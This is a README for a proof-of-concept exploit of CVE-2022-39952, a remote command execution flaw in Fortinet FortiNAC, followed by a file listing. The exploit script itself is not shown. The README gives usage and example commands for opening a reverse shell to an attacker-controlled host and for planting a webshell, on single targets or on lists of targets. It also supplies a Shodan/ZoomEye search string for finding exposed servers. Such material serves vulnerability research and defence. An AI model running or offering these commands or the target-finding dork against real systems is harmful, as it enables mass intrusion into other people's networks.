PoC for CVE-2022-39952 affecting Fortinet FortiNAC.# FortiNAC CVE-2022-39952
## PoC for CVE-2022-39952 affecting Fortinet FortiNAC.
> This exploit allows an attacker to execute arbitrary commands on the FortiNAC server. It is based on the PoC developed by [horizon3ai](https://github.com/horizon3ai/CVE-2022-39952), with additional options for targeting multiple hosts.
> Disclaimer: This exploit is for educational purposes only. Please use responsibly and with permission.
## Usage:
```bash
usage: exploit.py [-h] [-t TARGET] [-l LIST] [-lh LHOST] [-lp LPORT]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
The IP address of the target
-l LIST, --list LIST List of targets
-lh LHOST, --lhost LHOST
The local host for the reverse shell
-lp LPORT, --lport LPORT
The local port for the reverse shell
```
To use this exploit, you must have Python 3.x installed on your system.
## Requirements:
Python 3.x
requests module
concurrent.futures module
## Examples:
### Execute a reverse shell on a single target:
```bash
$ python exploit.py -t 192.168.1.100 -lh 192.168.1.10 -lp 4444
```
### Execute a webshell on a single target:
```
$ python exploit.py -t 192.168.1.100
```
### Execute a webshell on multiple targets from a list:
```bash
$ python exploit.py -l targets.txt
```
## Note:
>This exploit has only been tested on a limited number of targets, so its effectiveness may vary. The dork for finding potential targets on ZoomEye and Shodan is:
`title:"FortiNAC" +"JSESSIONID"`
[4.0K] /data/pocs/09bfcbc6075fa0baa09e8fb15169b54598795ba8
├── [5.8K] exploit.py
└── [1.5K] README.md
0 directories, 2 files